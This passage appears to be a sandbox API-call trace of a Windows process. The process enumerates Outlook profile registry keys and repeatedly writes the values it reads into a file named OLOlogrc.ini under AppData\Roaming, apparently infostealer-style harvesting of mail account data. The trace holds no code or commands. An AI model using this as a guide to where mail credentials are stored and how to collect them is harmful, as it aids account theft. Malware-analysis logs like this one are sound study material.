KeyInformation=0x24dd30, Length=0x200, ResultLength=0x24e178 | out: KeyInformation=0x24dd30, ResultLength=0x24e178) returned 0x0 [0106.786] NtCreateKey (in: KeyHandle=0x24e184, DesiredAccess=0x20219, ObjectAttributes=0x24d4e8*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x24e184*=0xa4) returned 0x0 [0106.786] NtEnumerateKey (in: KeyHandle=0xa4, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x24d930, Length=0x400, ResultLength=0x24e18c | out: KeyInformation=0x24d930, ResultLength=0x24e18c) returned 0x8000001a [0106.786] NtClose (Handle=0xa4) returned 0x0 [0106.786] NtEnumerateKey (in: KeyHandle=0x5c, Index=0xb, KeyInformationClass=0x0, KeyInformation=0x24dd30, Length=0x200, ResultLength=0x24e178 | out: KeyInformation=0x24dd30, ResultLength=0x24e178) returned 0x0 [0106.786] NtCreateKey (in: KeyHandle=0x24e184, DesiredAccess=0x20219, ObjectAttributes=0x24d4e8*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x24e184*=0xa4) returned 0x0 [0106.786] NtEnumerateKey (in: KeyHandle=0xa4, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x24d930, Length=0x400, ResultLength=0x24e18c | out: KeyInformation=0x24d930, ResultLength=0x24e18c) returned 0x0 [0106.786] NtCreateKey (in: KeyHandle=0x24e180, DesiredAccess=0x20219, ObjectAttributes=0x24d4e8*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x24e180*=0xa8) returned 0x0 [0106.789] NtEnumerateValueKey (in: KeyHandle=0xa8, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x24d530, Length=0x400, ResultLength=0x24e18c | out: KeyValueInformation=0x24d530, ResultLength=0x24e18c) returned 0x0 [0106.789] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.789] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.789] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.789] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0xc, ByteOffset=0x24d3b0*=40, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.789] NtClose (Handle=0xac) returned 0x0 [0106.789] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.789] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.789] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.789] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x52, ByteOffset=0x24d3b0*=52, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.789] NtClose (Handle=0xac) returned 0x0 [0106.789] NtEnumerateValueKey (in: KeyHandle=0xa8, Index=0x1, KeyValueInformationClass=0x1, KeyValueInformation=0x24d530, Length=0x400, ResultLength=0x24e18c | out: KeyValueInformation=0x24d530, ResultLength=0x24e18c) returned 0x0 [0106.789] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.789] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.789] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.789] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x12, ByteOffset=0x24d3b0*=134, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.790] NtClose (Handle=0xac) returned 0x0 [0106.797] RtlIntegerToChar (in: Value=0x84c4e4be, Base=0x0, Length=0x20, String=0x24d498 | out: String="2227496126") returned 0x0 [0106.797] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.797] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.798] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.798] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x18, ByteOffset=0x24d3b0*=152, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.798] NtClose (Handle=0xac) returned 0x0 [0106.798] NtEnumerateValueKey (in: KeyHandle=0xa8, Index=0x2, KeyValueInformationClass=0x1, KeyValueInformation=0x24d530, Length=0x400, ResultLength=0x24e18c | out: KeyValueInformation=0x24d530, ResultLength=0x24e18c) returned 0x0 [0106.798] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.798] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.798] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.798] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x18, ByteOffset=0x24d3b0*=176, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.798] NtClose (Handle=0xac) returned 0x0 [0106.798] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.798] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.798] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.798] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x14, ByteOffset=0x24d3b0*=200, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.798] NtClose (Handle=0xac) returned 0x0 [0106.798] NtEnumerateValueKey (in: KeyHandle=0xa8, Index=0x3, KeyValueInformationClass=0x1, KeyValueInformation=0x24d530, Length=0x400, ResultLength=0x24e18c | out: KeyValueInformation=0x24d530, ResultLength=0x24e18c) returned 0x0 [0106.798] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.798] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.799] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.799] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x1a, ByteOffset=0x24d3b0*=220, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.799] NtClose (Handle=0xac) returned 0x0 [0106.799] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.799] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.799] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.799] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x12, ByteOffset=0x24d3b0*=246, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.799] NtClose (Handle=0xac) returned 0x0 [0106.799] NtEnumerateValueKey (in: KeyHandle=0xa8, Index=0x4, KeyValueInformationClass=0x1, KeyValueInformation=0x24d530, Length=0x400, ResultLength=0x24e18c | out: KeyValueInformation=0x24d530, ResultLength=0x24e18c) returned 0x0 [0106.799] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.799] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.799] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.799] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x1c, ByteOffset=0x24d3b0*=264, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.799] NtClose (Handle=0xac) returned 0x0 [0106.806] RtlIntegerToChar (in: Value=0x2, Base=0x0, Length=0x20, String=0x24d498 | out: String="2") returned 0x0 [0106.806] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.807] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.807] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.807] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x6, ByteOffset=0x24d3b0*=292, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.807] NtClose (Handle=0xac) returned 0x0 [0106.807] NtEnumerateValueKey (in: KeyHandle=0xa8, Index=0x5, KeyValueInformationClass=0x1, KeyValueInformation=0x24d530, Length=0x400, ResultLength=0x24e18c | out: KeyValueInformation=0x24d530, ResultLength=0x24e18c) returned 0x0 [0106.807] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.807] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.807] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.807] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x1a, ByteOffset=0x24d3b0*=298, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.807] NtClose (Handle=0xac) returned 0x0 [0106.807] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.807] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.807] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.807] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x2e, ByteOffset=0x24d3b0*=324, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.807] NtClose (Handle=0xac) returned 0x0 [0106.807] NtEnumerateValueKey (in: KeyHandle=0xa8, Index=0x6, KeyValueInformationClass=0x1, KeyValueInformation=0x24d530, Length=0x400, ResultLength=0x24e18c | out: KeyValueInformation=0x24d530, ResultLength=0x24e18c) returned 0x0 [0106.807] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.807] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.807] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.808] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x20, ByteOffset=0x24d3b0*=370, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.808] NtClose (Handle=0xac) returned 0x0 [0106.808] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.808] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.808] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.808] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x14, ByteOffset=0x24d3b0*=402, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.808] NtClose (Handle=0xac) returned 0x0 [0106.808] NtEnumerateValueKey (in: KeyHandle=0xa8, Index=0x7, KeyValueInformationClass=0x1, KeyValueInformation=0x24d530, Length=0x400, ResultLength=0x24e18c | out: KeyValueInformation=0x24d530, ResultLength=0x24e18c) returned 0x8000001a [0106.808] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d4d0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.808] NtCreateFile (in: FileHandle=0x24d4f0, DesiredAccess=0x12019f, ObjectAttributes=0x24d4b8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d4d8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d4f0*=0xac, 